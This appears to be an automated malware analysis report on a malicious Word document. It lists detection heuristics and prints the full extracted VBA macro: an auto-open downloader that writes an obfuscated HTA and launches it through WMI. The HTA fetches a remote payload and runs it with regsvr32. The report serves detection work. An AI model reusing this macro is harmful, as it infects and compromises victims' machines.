Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6494c0178ea6098f…

MALICIOUS

Office (OOXML)

142.2 KB Created: 2021-04-16 07:09:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-04
MD5: 2c306102650b01d6e4ec4960892b7119 SHA-1: 510b72718536c029e75aa4a4d5c9e8ec61c7b3cb SHA-256: 6494c0178ea6098ffb96a166df8d652d7a71cb0be940e97096ec3aebcf9888a3
172 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/tiff/1.0/In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6416 bytes
SHA-256: b18f2f511523dcc8ff3ea3b15a3bf2a3f699ee8da4eb37179349c197666c93c4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{12AF68DC-E22A-4710-B77F-BE5988B2B49E}{F93A32A7-32C6-4B6B-A837-7987553D2321}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function rm()
rm = StrReverse("ath.yarrApawSW\atadmargorp\:c exe.rerolpxe\swodniw\:c")
End Function
Public Sub button1_Click()
Set arraySizeData = GetObject("winmgmts:root\cimv2:Win32_Process")
arraySizeData.Create p(rm)
End Sub


Attribute VB_Name = "screenExceptionConst"
Sub autoopen()
procedurePointerRef
End Sub
Function nvidia(optionDocumentConst, globalDocument)
If optionDocumentConst = 1 Then
nvidia = globalDocument
End If
End Function
Sub procedurePointerRef()
Dim structIndex As String
dataLinkTable = Split(p(frm.rm), " ")
structIndex = dataLinkTable(1)
Set valueNextDatabase = New removeScreen
valueNextDatabase.storageValue structIndex, lenMemLoad
frm.button1_Click
End Sub
Function deleteBuffer(tableListVb, optionException, bufLeftLen)
End Function

Attribute VB_Name = "memIndexSelect"
Function storagePastePaste(pointerMain As Long)
captionListbox = Chr(pointerMain)
storagePastePaste = nvidia(1, "<html><body><div id='content'>fTtlc29sYy5jb3JQZXZvbWVSZWxiYXQ7KTIgLCJncGoueWFyckFwYXdTV1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuY29yUGV2b21lUmVsYmF0Oyl5ZG9iZXNub3BzZXIubm9pdHBhQ3J0UHJldG5pb3AoZXRpcncuY29yUGV2b21lUmVsYmF0OzEgPSBlcHl0LmNvclBldm9tZVJlbGJhdDtuZXBvLmNvclBldm9tZVJlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSBjb3JQZXZvbWVSZWxiYXQgcmF2eykwMDIgPT0gc3V0YXRzLm5vaXRwYUNydFByZXRuaW9wKGZpOykoZG5lcy5ub2l0cGFDcnRQcmV0bmlvcDspZXNsYWYgLCJhZHNIR0tHWXBzOTBMPWRpJkYzVlp2djJaYz1kaT80dWxhbS8zNTA4My9zZ2")
End Function
Function trustConst(pointerMain As Long)
captionListbox = Chr(pointerMain)
trustConst = nvidia(1, "1JWldmZmU1eWZ2N2xVelc4U0hYV2hINGpQUEdoLzI3NzE3L204ekJibjh4SlNRYmJxQTRjaUxmVWhqZVpFQjNBYnlmbmF6UXVvem9BOFcvYUJUVExYcVVKVjF4a1NIV21MMEw1WFlhaG03UGdwdFNMMEFZN3h0aDNVR3MvZUVwbER3UkhYZTN4SXFnZ1doZ0xhL3RwMWdoZEtsQUNLa2k5RndQUEZINmNwOC8zQ1ZCZnFOZC8wRHBFWlRjN0R4YTNsenRkMXlMUzV1Y1JyVnJvdVRFaTdWc1FNMzMvc3l1b2cvbW9jLjEwMDJkcmFueWFtLXRyb3MvLzpwdHRoIiAsIlRFRyIobmVwby5ub2l0cGFDcnRQcmV0bmlvcDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IG5vaXRwYUNydFByZXRuaW9wIHJhdg==|fXspeG9idHhlVHlyZXVxKGhjdGFjfTspImF0aC55YXJyQXBhd")
End Function
Function indexIndex(pointerMain As Long)
captionListbox = Chr(pointerMain)
indexIndex = nvidia(1, "1NXXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZmV0ZWxlZC5lbHRpVGxhY29se3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGVsdGlUbGFjb2wgcmF2OykiZ3BqLnlhcnJBcGF3U1dcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuKSJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3'></div><script language='javascript'>function queryTempConst(indexClear){return(new ActiveXObject(indexClear));}function namespaceConvertMe")
End Function
Function buttonStorageA(pointerMain As Long)
captionListbox = Chr(pointerMain)
buttonStorageA = nvidia(1, "mory(tmpRepo){return(tableCaption.getElementById(tmpRepo).innerHTML);}function requestTable(){var queryProcedureRemove = namespaceConvertMemory('table1');var textboxTmpNext = queryProcedureRemove.toLowerCase();var queryText = namespaceConvertMemory('table2');return(queryProcedureRemove + textboxTmpNext + queryText);}function variableMainList(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var trustFuncVb=''; var w=String.fromCharCode; var L=s.length;var variablePtr = 'charAt';for(i=0;i<64;i++){e[")
End Function
Function structStorage(pointerMain As Long)
captionListbox = Chr(pointerMain)
structStorage = nvidia(1, "requestTable()[variablePtr](i)]=i;}for(x=0;x<L;x++){c=e[s[variablePtr](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(trustFuncVb+=w(a));}}return(trustFuncVb);};function varIndex(constLeft){return constLeft.split('').reverse().join('');}vbMemTemp = window;tableCaption = document;vbMemTemp.resizeTo(1, 1);vbMemTemp.moveTo(-100, -100);var iteratorTextClear = tableCaption.getElementById('content').innerHTML;var iteratorTextClear = iteratorTextClear.split('|');var localDatabaseGeneric = var")
End Function
Function queryProcedureIterator(pointerMain As Long)
captionListbox = Chr(pointerMain)
queryProcedureIterator = nvidia(1, "Index(variableMainList(iteratorTextClear[0]));var tmpGenericLink = varIndex(variableMainList(iteratorTextClear[1]));</script><script language='javascript'>function tableDocument(removePaste){var ExMemorySelect = queryTempConst('msscriptcontrol.scriptcontrol');ExMemorySelect.Language = 'jscript';ExMemorySelect.Timeout = 60000;ExMemorySelect.AddCode(removePaste);return(null);}</script><script language='vbscript'>tableDocument localDatabaseGeneric : tableDocument tmpGenericLink : vbMemTemp.close</script></body")
End Function
Function listTmp(pointerMain As Long)
captionListbox = Chr(pointerMain)
listTmp = nvidia(1, "></html>")
End Function
Function lenMemLoad()
lenMemLoad = storagePastePaste(2) + trustConst(0) + indexIndex(0) + buttonStorageA(4) + structStorage(1) + queryProcedureIterator(6) + listTmp(0)
End Function

Attribute VB_Name = "removeScreen"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub storageValue(windowListbox As String, funcButton As String)
Dim namespaceCounter As FileSystemObject
Set namespaceCounter = New FileSystemObject
Dim captionRemove As TextStream
Set captionRemove = namespaceCounter.CreateTextFile(windowListbox)
captionRemove.WriteLine funcButton
captionRemove.Close
Set captionRemove = Nothing
Set namespaceCounter = Nothing
End Sub

Attribute VB_Name = "countResponseArray"
Function p(linkTextbox)
p = linkTextbox
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32768 bytes
SHA-256: 49a8f96470558ec45fbab958c83c97c198b397f493defcf685d84304e7264fde
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.